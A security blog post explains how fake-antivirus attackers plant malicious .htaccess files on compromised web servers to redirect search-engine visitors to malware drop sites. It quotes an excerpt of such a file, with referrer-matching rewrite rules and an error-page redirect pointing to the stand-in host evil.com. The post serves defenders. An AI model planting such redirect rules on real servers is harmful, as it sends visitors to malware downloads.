dot HT what? More Fake Alert trickery.

Following on from the previous post about some of the tricks fake alert malware is getting up to [1], yesterday I noticed an interesting post on the Internet Storm Center diary [2]. It would appear attackers responsible for distributing the fake alert malware have started compromising the .htaccess files on web servers in order to redirect victims to the malware download sites [3].

The .htaccess files are essentially configuration files for some web servers (most commonly Apache). They enable web administrators to write powerful rules to control behaviour when a user browses content in that directory [4]. Most commonly they are used for:

  • redirecting to specific 404 or 403 error pages upon a navigation or authentication error
  • adding authentication to access certain sites/directories

The long and short of it is that our not-so-friendly-fake-alert-attackers appear to have upload malicious .htaccess files to various sites in order to redirect victims to the malware drop sites. An excerpt from a malicious file is shown below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
# insert other common referrers here
RewriteRule .* http://evil.com/in.html?... [R,L]
Errordocument 404 http://evil.com/in.html?...

So what does this do? Basically they are redirecting page requests to the malicious drop site. Users accessing pages within this folder via one of the search engine referrers will be redirected, but so could search engines as well (as they spider the site). In the diary post on the ISC site, they speculate that this is how the attackers are getting their drop sites ranked highly in search engine results.

Once redirected, the user is presented with a now-familiar interface, this time for ‘Windows Antivirus’. The “file-scanning” effect is achieved by the usual JavaScript [6].

[Screenshot of fake alert malware drop site]

The malware installed from this site is detected as Troj/FakeAV-DL.

Attacks involving malicious .htaccess files on legitimate web sites have been seen before in various other scams [7]. At the end of the day, if an attacker has freedom to upload or modify .htaccess files on your web server it is game over.